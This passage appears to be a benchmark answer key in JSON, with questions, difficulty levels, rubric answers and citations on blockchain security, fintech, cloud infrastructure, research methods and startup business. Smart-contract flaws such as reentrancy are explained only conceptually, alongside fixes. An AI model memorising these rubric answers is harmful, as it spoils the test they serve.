Tradeoff: 'nothing-at-stake' theoretical concern, addressed by slashing.", "citation": "https://ethereum.org/en/roadmap/merge/"}, {"id": "blockchain-03", "difficulty": "expert", "prompt": "Reference SWC-107: identify the reentrancy vulnerability pattern in Solidity and the canonical fix.", "rubric": "Pattern: a contract sends ETH (call/transfer) before updating its own state, allowing the recipient (a malicious contract) to re-enter the sending function and exploit the still-unchanged state (DAO 2016 hack). Canonical fix: Checks-Effects-Interactions pattern — perform external calls LAST, after all state mutations. Or: use OpenZeppelin's ReentrancyGuard modifier.", "citation": "https://swcregistry.io/docs/SWC-107"}, {"id": "blockchain-04", "difficulty": "intermediate", "prompt": "What's the difference between an EOA and a contract account in Ethereum?", "rubric": "EOA (Externally Owned Account): controlled by a private key, can send transactions, no code. Contract account: controlled by code, has code/storage, only acts when called by an EOA (directly or indirectly). Both have an address and balance. EIP-7702 (Pectra) blurs this — EOAs can temporarily delegate to contract code.", "citation": "https://ethereum.org/en/developers/docs/accounts/"}, {"id": "blockchain-05", "difficulty": "expert", "prompt": "What is MEV (Maximal Extractable Value) and what's a common defense for users?", "rubric": "MEV: profit a block producer (or searcher) can extract by reordering, inserting, or censoring transactions in a block — typically through arbitrage, liquidations, or sandwich attacks. User defenses: private mempools (Flashbots Protect, MEV-Blocker), commit-reveal schemes, intent-based architectures (CowSwap), batch auctions, slippage limits.", "citation": "https://ethereum.org/en/developers/docs/mev/"}, {"id": "blockchain-06", "difficulty": "beginner", "prompt": "What does it mean for a smart contract to be 'immutable' once deployed? 
How do real systems handle upgrades?", "rubric": "Once deployed, the contract's code is fixed at its address — bytecode cannot be modified. Upgrades use patterns: proxy contracts (delegatecall to an implementation address that can be swapped — UUPS, Transparent Proxy), or beacon proxies, or migration to a new contract with state copy.", "citation": "https://docs.openzeppelin.com/contracts/5.x/api/proxy"}, {"id": "blockchain-07", "difficulty": "intermediate", "prompt": "What is gas in Ethereum? Why is it priced separately from ETH?", "rubric": "Gas: unit of computational cost — every EVM opcode has a fixed gas cost. Transactions specify max gas + gas price. Decoupled from ETH so the protocol can adjust the gas-to-USD ratio independently of ETH price (via EIP-1559 base fee that adjusts each block based on demand). Gas is priced in gwei (10^-9 ETH).", "citation": "https://ethereum.org/en/developers/docs/gas/"}, {"id": "blockchain-08", "difficulty": "expert", "prompt": "What's the difference between an L2 rollup and a sidechain? Give one example of each.", "rubric": "L2 rollup: batches transactions off-chain but POSTS data + proofs to L1, inheriting L1 security. Optimistic (assume valid, fraud proofs — Arbitrum, Optimism) or ZK (validity proofs — zkSync, Starknet, Polygon zkEVM, Scroll). Sidechain: independent chain with own validators/consensus, periodic checkpoints to L1 — does NOT inherit L1 security (Polygon PoS, Ronin). Rollups are strictly more secure.", "citation": "https://ethereum.org/en/developers/docs/scaling/"}, {"id": "blockchain-09", "difficulty": "intermediate", "prompt": "What's the difference between ERC-20 and ERC-721? When would you use each?", "rubric": "ERC-20: fungible tokens — interchangeable units of equal value (USDC, DAI, governance tokens). ERC-721: non-fungible tokens — each token has a unique tokenId and metadata (NFTs, deeds, identity tokens). 
ERC-1155 is a hybrid (multi-token, both fungible and NFT in one contract).", "citation": "https://eips.ethereum.org/EIPS/eip-721"}, {"id": "blockchain-10", "difficulty": "expert", "prompt": "Reference SWC-101: explain integer overflow/underflow in Solidity. Why is it less of an issue in Solidity 0.8+?", "rubric": "SWC-101: arithmetic operations wrap around on overflow/underflow (uint256 max + 1 = 0 in <=0.7), enabling exploits like infinite token minting or balance underflow to huge numbers. Solidity 0.8+ checks arithmetic by default and reverts on over/underflow. The `unchecked { ... }` block opts out for gas savings in safe contexts (e.g., loop counters with known bounds).", "citation": "https://swcregistry.io/docs/SWC-101"}, {"id": "blockchain-11", "difficulty": "beginner", "prompt": "What is a private key in the context of a blockchain wallet? What happens if you lose it?", "rubric": "Private key: 256-bit secret used to sign transactions, derives the public key and address. Losing it = losing access to all funds at that address; no recovery (no central authority). Mitigations: seed phrases (BIP-39 12/24 words), hardware wallets, multi-sig, social recovery wallets (Argent), MPC wallets.", "citation": "https://github.com/bitcoin/bips/blob/master/bip-0039.mediawiki"}, {"id": "blockchain-12", "difficulty": "expert", "prompt": "What's the difference between a hard fork and a soft fork in blockchain consensus?", "rubric": "Soft fork: backward-compatible — old nodes accept new-rules blocks (new rules are a stricter subset). Doesn't split the chain (e.g., Bitcoin SegWit, Taproot). 
Hard fork: NOT backward-compatible — old nodes reject new-rules blocks, splitting the chain unless every node upgrades (Ethereum's hard forks like London/Shanghai/Pectra; or contentious splits like Ethereum Classic, Bitcoin Cash).", "citation": "https://ethereum.org/en/glossary/#fork"} ] }, "fintech": { "description": "payments, trading systems, market data, regulatory compliance — generic explanations only, NOT investment advice", "questions": [ {"id": "fintech-01", "difficulty": "beginner", "prompt": "What's the difference between ACH and a wire transfer for B2B payments?", "rubric": "ACH (Automated Clearing House): batch-processed, 1-3 business days settlement, low cost (~$0.20-1.50 per txn), reversible within ~60 days. Wire: real-time gross settlement, same-day, higher cost ($15-50 per txn), generally irrevocable once sent. Use ACH for recurring/non-urgent; wire for time-sensitive, large, or international.", "citation": "https://www.federalreserve.gov/paymentsystems/fedach_about.htm"}, {"id": "fintech-02", "difficulty": "intermediate", "prompt": "What is PCI-DSS, and what does 'PCI scope reduction' mean for a merchant?", "rubric": "PCI-DSS: Payment Card Industry Data Security Standard — required for any entity that stores/processes/transmits cardholder data (CHD). PCI scope = systems/processes within DSS audit boundaries. Scope reduction strategies: tokenization (replace PAN with token issued by processor), iframes/redirects to processor's hosted page, P2PE (point-to-point encryption), network segmentation. Less scope = less audit cost + smaller attack surface.", "citation": "https://www.pcisecuritystandards.org/document_library/"}, {"id": "fintech-03", "difficulty": "expert", "prompt": "What is a market maker, and how do they profit on the spread?", "rubric": "Market maker: continuously posts both bid and ask prices for an asset, providing liquidity. Profit on spread = ask - bid (if they buy at bid then sell at ask, they capture the spread). 
Risk: inventory exposure during volatile moves. Rebates from exchanges for providing liquidity (maker-taker model). Modern HFT MMs hold inventory for milliseconds, hedge in correlated venues.", "citation": "https://www.sec.gov/divisions/marketreg/mrnotices/2017/section3-mma-mt-final-version-09142017.pdf"}, {"id": "fintech-04", "difficulty": "intermediate", "prompt": "What's the difference between a market order, limit order, and stop order?", "rubric": "Market: execute immediately at best available price (fills, but slippage risk). Limit: execute only at specified price or better (controls price, but may not fill). Stop: trigger an order when price crosses a threshold — stop-loss (sell when price falls below) or stop-buy (buy when price rises above); becomes a market order once triggered (or stop-limit if specified).", "citation": "https://www.sec.gov/investor/alerts/trading-basics.pdf"}, {"id": "fintech-05", "difficulty": "expert", "prompt": "What is KYC and AML? How are they related but distinct?", "rubric": "KYC (Know Your Customer): identity verification + understanding customer's financial profile/risk. AML (Anti-Money Laundering): broader regulatory framework that includes KYC + transaction monitoring + suspicious activity reporting (SAR) + sanctions screening. KYC is a pillar of AML; AML is the umbrella. FATF sets international standards; jurisdictions implement (BSA/FinCEN in US, AMLD6 in EU, MAS notice 626 in Singapore).", "citation": "https://www.fatf-gafi.org/publications/fatfrecommendations/documents/fatf-recommendations.html"}, {"id": "fintech-06", "difficulty": "intermediate", "prompt": "What does T+1 settlement mean for US equities, and when did it take effect?", "rubric": "T+1 = trade date plus 1 business day for settlement (cash and securities transfer). Took effect in US on May 28, 2024 (down from T+2). Reduces counterparty risk and capital requirements but compresses operational windows. 
EU and UK are moving to T+1 in October 2027.", "citation": "https://www.sec.gov/news/press-release/2023-29"}, {"id": "fintech-07", "difficulty": "expert", "prompt": "What is a credit default swap (CDS), and what role did it play in the 2008 financial crisis?", "rubric": "CDS: insurance-like derivative — buyer pays premium, seller pays if a referenced entity defaults. Used for hedging or speculation. 2008: AIG sold massive CDS exposure on subprime MBS without sufficient capital reserves; when defaults hit, AIG couldn't pay, requiring $182B federal bailout. Highlighted shadow banking, opacity, counterparty risk concentration. Post-crisis: most CDS now centrally cleared via DTCC/ICE.", "citation": "https://www.federalreserve.gov/regreform/policy.htm"}, {"id": "fintech-08", "difficulty": "beginner", "prompt": "Explain compound interest in 2-3 sentences with an example.", "rubric": "Interest earned on both principal and previously accrued interest. $1,000 at 5% compounded annually for 10 years = $1,000 * (1.05)^10 ≈ $1,629. Distinct from simple interest ($1,500). The Rule of 72: years to double ≈ 72 / interest_rate%.", "citation": "https://www.investor.gov/introduction-investing/investing-basics/glossary/compound-interest"}, {"id": "fintech-09", "difficulty": "intermediate", "prompt": "What is the LIBOR scandal, and what replaced LIBOR?", "rubric": "LIBOR (London Interbank Offered Rate): benchmark for ~$300T of contracts. Banks self-reported submissions; in 2008-2012 several manipulated submissions for profit. Replaced (in USD) by SOFR (Secured Overnight Financing Rate) — based on actual repo market transactions, harder to manipulate. Other jurisdictions: SONIA (UK), €STR (EU), TONA (JP). 
LIBOR fully retired June 2023.", "citation": "https://www.federalreserve.gov/newsevents/pressreleases/bcreg20171108b.htm"}, {"id": "fintech-10", "difficulty": "expert", "prompt": "What is Basel III, and why do banks care about Common Equity Tier 1 (CET1) ratio?", "rubric": "Basel III: international banking regulation framework (BCBS, post-2008). CET1 ratio = (CET1 capital) / (risk-weighted assets), minimum 4.5% + buffers (2.5% conservation buffer, 0-2.5% counter-cyclical, GSIB surcharge for big banks → 8-13% effective minimums). Banks care because: regulator-imposed dividend/buyback restrictions if breached; market signal of solvency; affects ability to lend (RWA capacity).", "citation": "https://www.bis.org/bcbs/basel3.htm"}, {"id": "fintech-11", "difficulty": "intermediate", "prompt": "What's the difference between credit card and debit card from the merchant's perspective regarding fees?", "rubric": "Credit: higher interchange fees (~1.5-3%), revenue source for issuing bank, broader fraud protection (Reg Z). Debit: lower interchange (~0.05-0.1% + ~$0.20 flat per Durbin amendment for regulated banks >$10B assets), pulls from customer's bank account directly. Merchants pay less on debit; some incentivize via PIN-debit which has even lower fees than signature-debit.", "citation": "https://www.federalreserve.gov/paymentsystems/regii-about.htm"}, {"id": "fintech-12", "difficulty": "expert", "prompt": "What's the difference between IFRS 9 expected credit loss (ECL) model and the prior incurred-loss model?", "rubric": "Incurred-loss (IAS 39): provision for losses only after objective evidence of impairment — pro-cyclical, slow to recognize losses (criticized post-2008). IFRS 9 ECL (effective 2018): forward-looking — recognize lifetime expected losses on Stage 2 (significant credit deterioration) and Stage 3 (credit-impaired) assets, 12-month ECL on Stage 1. 
Earlier loss recognition, more volatile P&L, requires macro-economic forecasting.", "citation": "https://www.ifrs.org/issued-standards/list-of-standards/ifrs-9-financial-instruments/"} ] }, "infrastructure": { "description": "cloud + DevOps: AWS/GCP/Azure, Kubernetes, Terraform, observability, SRE", "questions": [ {"id": "infrastructure-01", "difficulty": "beginner", "prompt": "What's the difference between IaaS, PaaS, and SaaS? Give one example of each.", "rubric": "IaaS (Infrastructure-as-a-Service): raw VMs/networking — AWS EC2, GCP Compute Engine. PaaS (Platform-as-a-Service): managed runtime, deploy code — Heroku, Vercel, Cloud Run. SaaS (Software-as-a-Service): finished application — Gmail, Salesforce, Notion. Stack metaphor: IaaS gives you the kitchen, PaaS gives you the appliances, SaaS serves you a meal.", "citation": "https://www.nist.gov/publications/nist-definition-cloud-computing"}, {"id": "infrastructure-02", "difficulty": "intermediate", "prompt": "In Kubernetes, what's the difference between a Deployment, StatefulSet, and DaemonSet?", "rubric": "Deployment: stateless replicated pods, interchangeable, rolling updates. StatefulSet: ordered, stable network identities (pod-0, pod-1...), stable persistent storage per pod — for databases, distributed systems with leader election. DaemonSet: one pod per node — for log shippers, node-level monitoring, CNI plugins. Choose by stateless/stateful/per-node.", "citation": "https://kubernetes.io/docs/concepts/workloads/controllers/"}, {"id": "infrastructure-03", "difficulty": "intermediate", "prompt": "What's the difference between horizontal and vertical scaling? When does one not work?", "rubric": "Vertical: bigger machine (more CPU/RAM). Limited by max instance size, single point of failure. Horizontal: more machines (load-balanced or sharded). Scales further but requires the workload to be parallelizable. Vertical doesn't work past hardware limits or when you need redundancy. 
Horizontal doesn't work for: stateful apps without distribution layer, single-threaded bottlenecks (Redis pre-cluster), workloads with global state.", "citation": "https://aws.amazon.com/builders-library/"}, {"id": "infrastructure-04", "difficulty": "expert", "prompt": "Explain the SRE concept of error budget. How does it inform release cadence?", "rubric": "Error budget = (1 - SLO target) — e.g., 99.9% SLO means 0.1% allowed unavailability per period (~43 min/month). Errors below SLO consume budget. If budget is healthy: ship faster, take risks. If budget exhausted: freeze releases, focus on reliability. Aligns dev (ship features) and ops (stay reliable) incentives — both share the same budget.", "citation": "https://sre.google/sre-book/embracing-risk/"}, {"id": "infrastructure-05", "difficulty": "intermediate", "prompt": "What is Terraform, and what does the term 'idempotent' mean for IaC?", "rubric": "Terraform: declarative IaC tool — describe desired state in HCL, Terraform computes the diff and applies changes. Idempotent: applying the same config repeatedly converges to the same state — re-running `terraform apply` on already-converged infra is a no-op. Critical for CI/CD reliability and disaster recovery.", "citation": "https://developer.hashicorp.com/terraform/intro"}, {"id": "infrastructure-06", "difficulty": "expert", "prompt": "What's the difference between a Service Mesh and an API Gateway? Can they coexist?", "rubric": "API Gateway: edge — north-south traffic (clients to services), handles auth, rate limiting, routing, transformation. Examples: Kong, AWS API Gateway. Service Mesh: in-cluster — east-west traffic (service-to-service), handles mTLS, retries, circuit-breaking, observability. Examples: Istio, Linkerd. They coexist routinely: gateway at edge, mesh handles internal flow.", "citation": "https://istio.io/latest/about/service-mesh/"}, {"id": "infrastructure-07", "difficulty": "beginner", "prompt": "What's the difference between TCP and HTTP? 
Is HTTPS at a different layer?", "rubric": "TCP: transport layer (L4) — reliable, ordered byte stream between two hosts. HTTP: application layer (L7) — request/response protocol over TCP. HTTPS: HTTP over TLS over TCP — TLS adds encryption and authentication at L6/7 boundary. So TCP < TLS < HTTP/HTTPS in the OSI sense.", "citation": "https://www.rfc-editor.org/rfc/rfc9110.html"}, {"id": "infrastructure-08", "difficulty": "intermediate", "prompt": "What is a CDN, and why does it improve performance?", "rubric": "CDN (Content Delivery Network): geographically distributed servers that cache content close to users. Improves: latency (shorter physical distance), bandwidth (offloads origin), reliability (origin failure → CDN serves stale), security (DDoS absorption, TLS termination). Examples: Cloudflare, Fastly, Akamai. Modern CDNs also do edge compute (Workers, Edge Functions).", "citation": "https://developers.cloudflare.com/learning-paths/get-started/concepts/what-is-a-cdn/"}, {"id": "infrastructure-09", "difficulty": "expert", "prompt": "Reference the four golden signals from Google SRE. List them and what they measure.", "rubric": "Latency (time to serve a request — distinguish successful vs failed requests). Traffic (rate of demand — RPS, network I/O). Errors (rate of failed requests — explicit failures + slow successes). Saturation (how 'full' the service is — CPU/memory/connection-pool utilization). Related heuristics: the RED method (Rate, Errors, Duration) and USE method (Utilization, Saturation, Errors). Sufficient for most service health monitoring.", "citation": "https://sre.google/sre-book/monitoring-distributed-systems/"}, {"id": "infrastructure-10", "difficulty": "intermediate", "prompt": "What's the difference between blue-green deployment and canary deployment?", "rubric": "Blue-green: two identical environments. Deploy new (green) alongside old (blue), switch traffic 100% at once when ready, keep blue for rollback. Fast cutover, fast rollback, requires 2x resources. 
Canary: deploy new version to a small subset (1-10%) of traffic, monitor, gradually increase. Slower but limits blast radius. Real systems often combine: blue-green at infra level + canary at traffic level.", "citation": "https://martinfowler.com/bliki/BlueGreenDeployment.html"}, {"id": "infrastructure-11", "difficulty": "expert", "prompt": "What is etcd, and why is it the heart of a Kubernetes cluster?", "rubric": "etcd: distributed key-value store using Raft consensus, strongly consistent. Kubernetes uses etcd as the single source of truth for ALL cluster state — pods, services, secrets, configmaps, RBAC. Loss of etcd = loss of cluster state. Production etcd: 3 or 5 nodes (odd for Raft quorum), backed up regularly, low-latency disk. The kube-apiserver is the only direct client.", "citation": "https://kubernetes.io/docs/tasks/administer-cluster/configure-upgrade-etcd/"}, {"id": "infrastructure-12", "difficulty": "intermediate", "prompt": "What's the difference between a hot and cold standby in disaster recovery?", "rubric": "Cold: secondary site has hardware/data backups but services are not running — start from zero on failover (RTO = hours). Warm: services running but reduced capacity, data periodically synced (RTO = minutes). Hot: identical capacity, real-time replication, automatic failover (RTO = seconds, RPO ≈ 0). Cost increases with heat; choose by RTO/RPO requirements.", "citation": "https://aws.amazon.com/architecture/well-architected/reliability-pillar/"} ] }, "research": { "description": "research methodology, paper critique, statistics, reproducibility, peer review", "questions": [ {"id": "research-01", "difficulty": "beginner", "prompt": "What's the difference between p-value and effect size? Why does a low p-value not mean a result is important?", "rubric": "P-value: probability of observing the data (or more extreme) under the null hypothesis. Low p = unlikely under null, but says nothing about the magnitude of the effect. 
Effect size: how large the actual difference is (Cohen's d, R², Pearson r). With huge n, tiny effects get tiny p-values but are practically meaningless. Always report both.", "citation": "https://www.amstat.org/asa/files/pdfs/P-ValueStatement.pdf"}, {"id": "research-02", "difficulty": "intermediate", "prompt": "What is p-hacking, and how does pre-registration mitigate it?", "rubric": "P-hacking: running many analyses and reporting only the significant ones, or stopping data collection when p < 0.05, or selectively excluding outliers. Inflates Type I error rate. Pre-registration: state hypotheses, design, and analysis plan BEFORE seeing the data, in a public registry (OSF, AsPredicted, ClinicalTrials.gov). Forces honest reporting of all results, distinguishes confirmatory from exploratory analyses.", "citation": "https://www.cos.io/initiatives/prereg"}, {"id": "research-03", "difficulty": "expert", "prompt": "What is the replication crisis, and which fields have been hit hardest?", "rubric": "Replication crisis: many published findings (especially in psychology, biomedical, economics) cannot be reproduced in independent studies. Open Science Collaboration (2015): only 36% of psych findings replicated. Hardest hit: social/cognitive psychology, biomedical (especially preclinical), nutritional epidemiology, parts of economics. Drivers: publication bias toward positive results, small samples, p-hacking, lack of pre-registration, weak statistical training.", "citation": "https://www.science.org/doi/10.1126/science.aac4716"}, {"id": "research-04", "difficulty": "intermediate", "prompt": "What's the difference between systematic review and meta-analysis?", "rubric": "Systematic review: comprehensive structured literature search + appraisal of all relevant studies on a question (PRISMA guidelines). Qualitative narrative or quantitative synthesis. 
Meta-analysis: a quantitative method WITHIN a systematic review — statistically combine effect sizes from multiple studies for a pooled estimate (random-effects or fixed-effect model). All meta-analyses should be embedded in a systematic review; not all systematic reviews include meta-analysis.", "citation": "https://www.prisma-statement.org/"}, {"id": "research-05", "difficulty": "expert", "prompt": "What is publication bias, and what's a common diagnostic for it?", "rubric": "Publication bias: positive/significant results more likely to be published than null/negative — meta-analyses skewed toward larger effects. Diagnostics: funnel plot (asymmetry suggests bias — small studies cluster on one side), Egger's test (statistical test of funnel asymmetry), trim-and-fill, p-curve analysis. Mitigation: registries (clinicaltrials.gov), publish-the-null journals, registered reports.", "citation": "https://methods.cochrane.org/bias/funnel-plot-asymmetry"}, {"id": "research-06", "difficulty": "intermediate", "prompt": "Why is correlation not causation? Give one famous spurious correlation example.", "rubric": "Correlation = two variables move together. Causation requires: (1) covariation, (2) temporal precedence, (3) elimination of confounders, (4) plausible mechanism. Confounders/lurking variables can produce strong correlations without causal links. Example: ice cream sales correlate with drowning deaths (both caused by summer weather). Or: pirate count vs global temperature (Pastafarian classic). Tools to establish causation: RCTs, instrumental variables, regression discontinuity, difference-in-differences.", "citation": "https://en.wikipedia.org/wiki/Spurious_relationship"}, {"id": "research-07", "difficulty": "expert", "prompt": "What's a randomized controlled trial (RCT), and why is it the gold standard for causal inference?", "rubric": "RCT: random assignment of subjects to treatment vs control groups. 
Random assignment ensures (in expectation) that confounders are balanced between groups, so any post-treatment difference is attributable to the treatment. Gold standard because: addresses both observable and unobservable confounders, supports causal claims. Limits: external validity (lab vs real world), ethical constraints (can't randomize harms), expense, sometimes infeasible.", "citation": "https://www.consort-statement.org/"}, {"id": "research-08", "difficulty": "beginner", "prompt": "What is peer review, and what are 3 common forms?", "rubric": "Peer review: subject-matter experts evaluate a manuscript before publication. Forms: single-blind (reviewers know authors, authors don't know reviewers — most common), double-blind (neither side knows), open (both sides identified, sometimes review published alongside), post-publication (PubPeer, F1000Research). Each has tradeoffs in bias, accountability, speed.", "citation": "https://publicationethics.org/files/peer-review-guidelines_0.pdf"}, {"id": "research-09", "difficulty": "expert", "prompt": "What does it mean for a study to be 'underpowered'? Why is power 0.8 the typical target?", "rubric": "Statistical power: probability of detecting a true effect of given size at a given significance level (1 - Type II error rate). Underpowered: insufficient sample size to reliably detect plausible effect sizes — null results are uninformative, significant results are inflated (Type M and Type S errors, Gelman). 0.8 is convention from Cohen — balances detection probability with cost. Modern best practice: pre-specified power analysis based on smallest effect size of interest.", "citation": "https://psycnet.apa.org/record/1988-98980-000 (Cohen 1988 — Statistical Power Analysis)"}, {"id": "research-10", "difficulty": "intermediate", "prompt": "What is reproducibility vs replicability in science? They are not the same.", "rubric": "Reproducibility (computational): same data + same code → same result (re-running analysis). 
Replicability: same procedure on NEW data → same conclusion (independent re-experiment). Reproducibility is necessary but not sufficient — a study can be reproducible (analysis re-runs) but not replicable (effect doesn't survive re-collection). NASEM (2019) report formalized these definitions.", "citation": "https://nap.nationalacademies.org/catalog/25303/reproducibility-and-replicability-in-science"}, {"id": "research-11", "difficulty": "expert", "prompt": "What is the file-drawer problem? How does it relate to publication bias?", "rubric": "File-drawer problem (Rosenthal 1979): null/negative results sit in researchers' file drawers, never submitted or published. Subset/cause of publication bias. Quantified by Rosenthal's fail-safe N — how many null studies it would take to nullify a meta-analytic effect. Solved by: registered reports (acceptance based on methods, before results), pre-registration, reporting guidelines, dedicated null-result journals.", "citation": "https://psycnet.apa.org/record/1979-27602-001"}, {"id": "research-12", "difficulty": "intermediate", "prompt": "When reading a paper, what's the most important question to ask after reading the abstract?", "rubric": "What is the actual claim, and what evidence supports it? More specifically: (a) what's the population/sample? (b) what was actually measured? (c) what comparison group? (d) is the headline result the prespecified primary outcome or a post-hoc finding? (e) effect size + uncertainty (CI), not just p-value? Acceptable framings: 'Is the result the primary or exploratory analysis?' 
or 'What's the effect size with confidence interval?'", "citation": "https://www.equator-network.org/"} ] }, "business": { "description": "business operations and strategy for technical founders: pricing, GTM, hiring, fundraising basics", "questions": [ {"id": "business-01", "difficulty": "beginner", "prompt": "What's the difference between a SaaS company's MRR and ARR?", "rubric": "MRR (Monthly Recurring Revenue): predictable subscription revenue per month. ARR (Annual Recurring Revenue) = MRR × 12 (or summed annual contracts). Reported metrics that exclude one-time fees, services, transactional revenue. ARR is the headline number for SaaS valuation; MRR is the operational metric for ops/sales.", "citation": "https://www.bvp.com/atlas/saas-finance-and-operating-metrics"}, {"id": "business-02", "difficulty": "intermediate", "prompt": "What is the rule of 40 in SaaS, and why does it matter?", "rubric": "Rule of 40: a healthy SaaS company's growth rate (%) + profit margin (%) ≥ 40. Captures the trade-off between growth and profitability — investors accept low margins from fast-growers and slower growth from profitable companies. Below 40: company's combined story is weak. Used as a heuristic in board reviews and term-sheet negotiations.", "citation": "https://www.bvp.com/atlas/the-rule-of-40-introduction"}, {"id": "business-03", "difficulty": "expert", "prompt": "What's the difference between participating and non-participating preferred stock in a startup term sheet?", "rubric": "Both have liquidation preference (typically 1x): get their money back before common. Non-participating: choose between (a) 1x preference, OR (b) convert to common and take pro-rata share — whichever is greater. Participating: get the 1x preference AND pro-rata share of remaining proceeds (double-dip). Participating is more aggressive; recent founder-friendly markets default to non-participating with 1x cap. 
When participating preferred is used, participation caps (typically 2-3x) are common.", "citation": "https://www.nvca.org/model-legal-documents/"}, {"id": "business-04", "difficulty": "beginner", "prompt": "What's the difference between revenue, gross profit, and net profit?", "rubric": "Revenue (top line): total money in. Gross profit = revenue - COGS (direct costs of delivering the product). Net profit (bottom line) = revenue - all costs (COGS + opex + interest + taxes). Margins: gross margin = gross profit / revenue (e.g., SaaS often 70-90%); net margin = net profit / revenue (much smaller, often 0-30% for healthy SaaS).", "citation": "https://www.investor.gov/introduction-investing/investing-basics/glossary/income-statement"}, {"id": "business-05", "difficulty": "intermediate", "prompt": "What is CAC and LTV, and what's a healthy LTV:CAC ratio for SaaS?", "rubric": "CAC (Customer Acquisition Cost): total sales+marketing spend / new customers acquired. LTV (Lifetime Value): expected total revenue from a customer over their lifetime; for subscription SaaS approximately = ARPU * gross_margin / churn_rate. Healthy LTV:CAC ratio for SaaS: 3:1 or higher. <1:1 is losing money on every customer; 5:1+ may indicate underinvestment in growth.", "citation": "https://www.bvp.com/atlas/saas-finance-and-operating-metrics"}, {"id": "business-06", "difficulty": "expert", "prompt": "What's the difference between a SAFE and a convertible note? Which is more founder-friendly?", "rubric": "SAFE (Simple Agreement for Future Equity, YC 2013): equity-only — converts to shares at the next priced round, no interest, no maturity. Convertible note: debt — interest accrues, maturity date, can demand repayment if no priced round. SAFE is more founder-friendly (no interest, no debt overhang); convertible notes are more investor-friendly (downside protection). 
Post-money SAFE (2018) further protects investors against dilution between SAFE and priced round.", "citation": "https://www.ycombinator.com/documents"}, {"id": "business-07", "difficulty": "intermediate", "prompt": "What is product-market fit (PMF), and what's one signal that you have it?", "rubric": "PMF: the product satisfies a strong market need — you're in a market that wants what you're selling, profitably. Signals: organic growth (users tell others), retention curves flatten (cohort doesn't churn to zero), waiting lists, customers buy without being convinced, '40% disappointed' Sean Ellis test (>40% would be very disappointed if product disappeared). Pre-PMF: every user takes effort to acquire and retain.", "citation": "https://review.firstround.com/how-superhuman-built-an-engine-to-find-product-market-fit"}, {"id": "business-08", "difficulty": "beginner", "prompt": "What's the difference between a C-corp and an LLC in the US? Which do startups raising VC use?", "rubric": "C-corp: separate legal entity, double taxation (corporate + dividend), can issue multiple share classes (preferred + common), unlimited shareholders. LLC: pass-through taxation, simpler structure, but limited share class flexibility, complications for VC investment. Startups raising VC = Delaware C-corp (default for institutional investment, mature case law, supports preferred stock + ISOs).", "citation": "https://www.delaware.gov/services/businesses/"}, {"id": "business-09", "difficulty": "expert", "prompt": "What is a 409A valuation, and why does it matter for ISO exercise?", "rubric": "409A: independent valuation of a private company's common stock for tax purposes (IRS Section 409A). Sets the strike price for incentive stock options (ISOs). Updated annually or after material events. Matters because: ISOs must be issued at or above 409A FMV — below it, employees face immediate ordinary income tax + penalties. Higher 409A → higher strike → less upside for new hires. 
Companies want low 409A early, push higher only after material progress.", "citation": "https://www.irs.gov/retirement-plans/section-409a-deferred-compensation-rules"}, {"id": "business-10", "difficulty": "intermediate", "prompt": "What's the difference between an MOU and a contract? Is an MOU legally binding?", "rubric": "MOU (Memorandum of Understanding): typically non-binding statement of intent or framework for future contracts. Contract: legally binding agreement with offer, acceptance, consideration. CAN be binding if the language is binding (varies by jurisdiction and intent — Australia is more aggressive than US). Practice: explicitly state 'non-binding except for [confidentiality, exclusivity]' in MOUs to avoid ambiguity. LOIs and term sheets often have similar structure.", "citation": "https://www.law.cornell.edu/wex/contract"}, {"id": "business-11", "difficulty": "expert", "prompt": "What's the difference between a pivot and a feature change? Give one famous startup pivot example.", "rubric": "Feature change: incremental adjustment within the existing product/customer/business model. Pivot: structural change — new customer segment, new value prop, new revenue model, new technology platform. Famous pivots: Slack (was a game company, Tiny Speck → Glitch → Slack), Twitter (Odeo podcast platform → status updates), Instagram (Burbn check-in app → photo sharing), YouTube (dating site → video sharing). A pivot resets PMF — a feature change refines it.", "citation": "https://hbr.org/2014/06/how-and-when-to-pivot"}, {"id": "business-12", "difficulty": "intermediate", "prompt": "Define liquidation preference and walk through 1x non-participating in a $50M exit with $10M raised at 1x.", "rubric": "Liquidation preference: order and amount preferred shareholders receive on exit/liquidation before common. 1x non-participating means: investor can either take their $10M back OR convert to common and take pro-rata share. 
Pro-rata example: if VC owns 25%, conversion gives them 25% × $50M = $12.5M. Investor takes max($10M, $12.5M) = $12.5M (converts). Common gets the remaining $37.5M. If exit was $30M, conversion gives 25% × $30M = $7.5M, so VC takes the $10M preference instead.", "citation": "https://www.nvca.org/model-legal-documents/"} ] } } }